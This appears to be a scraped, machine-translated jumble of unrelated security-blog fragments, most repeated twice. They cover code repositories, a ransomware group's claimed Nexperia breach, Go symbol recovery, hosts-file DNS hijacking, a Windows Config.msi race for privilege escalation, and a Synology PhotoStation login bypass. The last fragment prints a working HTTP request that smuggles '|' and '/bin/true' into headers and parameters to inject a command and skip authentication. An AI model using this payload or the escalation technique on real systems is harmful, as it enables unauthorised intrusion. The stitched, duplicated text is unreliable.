The code repository is the core of the development workflow and the sole true source of the project. They are located at:
The development team collaborates on writing code without interfering with each other.
They automatically track and record changes.
Code reviews are conducted in context.
The continuous integration/continuous deployment (CI/CD) pipeline begins its journey.
The entire history of your project is saved and searchable.
When you work with your team, real miracles happen. Repositories allow developers in different time zones to work on the same codebase simultaneously, seamlessly merge their changes, and maintain code quality through built-in review processes.
The development team collaborates on writing code without interfering with each other.
They automatically track and record changes.
Code reviews are conducted in context.
The continuous integration/continuous deployment (CI/CD) pipeline begins its journey.
The entire history of your project is saved and searchable.
When you work with your team, real miracles happen. Repositories allow developers in different time zones to work on the same codebase simultaneously, seamlessly merge their changes, and maintain code quality through built-in review processes.
"Dunghill Leak" announced a successful intrusion into Nexperia, claiming to have stolen 1 TB of confidential data and leaked samples of the allegedly stolen files. To prove the validity of their claim, the attackers published microscope scan images of the electronic components, employee passports, confidentiality agreements, and other various samples.
Symbol restoration in high version Go language
pclntable is generally equal to ftab, referring to the figure above, ftab and pclntable fill in the values of pclntable.
funcnametab fills in the function names.
pclntable is generally equal to ftab, referring to the figure above, ftab and pclntable fill in the values of pclntable.
funcnametab fills in the function names.
It is necessary to have Apache or Nginx services on the hijacked computer, or the hijacker to have a server.
Find the hosts file in C:\Windows\System32\drivers\etc, drag it to the desktop for operation.
Note that the 127.0.0.1 entries are ones I used previously for using PS and other Adobe software.
Next, perform the DNS hijacking operation, then put it back in its original place. Since I have Apache installed on my computer, I can directly see the effect.
Use 360极速 browser to see the effect.
Here's another picture to show the situation.
Find the hosts file in C:\Windows\System32\drivers\etc, drag it to the desktop for operation.
Note that the 127.0.0.1 entries are ones I used previously for using PS and other Adobe software.
Next, perform the DNS hijacking operation, then put it back in its original place. Since I have Apache installed on my computer, I can directly see the effect.
Use 360极速 browser to see the effect.
Here's another picture to show the situation.
A UAC popup and installation interface appear when executing from the command line. I saw in the ToDesk documentation that the /S parameter of the ToDesk_Setup.exe installer can achieve a silent installation, but it will still show a UAC popup. The default installation directory is as follows, and the program runs automatically after installation.
Attempted to increase the number of CPUs for the virtual machine, optimized the code created by Config.msi for monitoring, but none were successful. At the same time, I used procmon to monitor the execution process of the msi file and confirmed that the Config.msi directory was indeed created twice.
Therefore, the conclusion is only one: the secondary creation of the Config.msi directory occurs too quickly. However, since the secondary creation of the Config.MSI directory is indeed happening, and the code has already detected the behavior of the first deletion, what would happen if the opportunity lock 2 is released at this point?
If we do not monitor the secondary creation of the Config.msi directory and directly release opportunity lock 2, because the time interval for the secondary creation of the Config.msi directory is very short, the sdrsvc that has been waiting for a long time will have the opportunity to successfully delete Config.msi. At this point, the vulnerability exploitation process can continue and successfully achieve the vulnerability exploitation!
Therefore, the conclusion is only one: the secondary creation of the Config.msi directory occurs too quickly. However, since the secondary creation of the Config.MSI directory is indeed happening, and the code has already detected the behavior of the first deletion, what would happen if the opportunity lock 2 is released at this point?
If we do not monitor the secondary creation of the Config.msi directory and directly release opportunity lock 2, because the time interval for the secondary creation of the Config.msi directory is very short, the sdrsvc that has been waiting for a long time will have the opportunity to successfully delete Config.msi. At this point, the vulnerability exploitation process can continue and successfully achieve the vulnerability exploitation!
PhotoStation No Password Login
We mainly focus on PhotoStation, which is the image management system enabled in most Synology DSM (DiskStation Manager).
The first vulnerability allows us to log in as an administrator without entering a password.
Viewpoint 1:
GET //photo/login.php?usr=admin&sid=xxx&SynoToken=/bin/true HTTP/1.1
Host: bamboofox.hopto.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: |
Cookie: stay_login=0; language=en; PHPSESSID=ime6mqrg0pghbjo4p9aomqcbv0; left-panel-visibility=show
Connection: close
The focus is on the | field in X-Forwarded-For and the characters in the SynoToken get parameter. The server CGI will concatenate the strings usr, X-Forwarded-For, and SynoToken into a command execution. However, the special characters | in and are not properly filtered, leading to a command injection vulnerability.
Therefore, in our PoC1, the command will become:
/usr/syno/bin/synophoto_dsm_user username | /bin/true
This command will return 0 (True) to bypass authentication.
We mainly focus on PhotoStation, which is the image management system enabled in most Synology DSM (DiskStation Manager).
The first vulnerability allows us to log in as an administrator without entering a password.
Viewpoint 1:
GET //photo/login.php?usr=admin&sid=xxx&SynoToken=/bin/true HTTP/1.1
Host: bamboofox.hopto.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: |
Cookie: stay_login=0; language=en; PHPSESSID=ime6mqrg0pghbjo4p9aomqcbv0; left-panel-visibility=show
Connection: close
The focus is on the | field in X-Forwarded-For and the characters in the SynoToken get parameter. The server CGI will concatenate the strings usr, X-Forwarded-For, and SynoToken into a command execution. However, the special characters | in and are not properly filtered, leading to a command injection vulnerability.
Therefore, in our PoC1, the command will become:
/usr/syno/bin/synophoto_dsm_user username | /bin/true
This command will return 0 (True) to bypass authentication.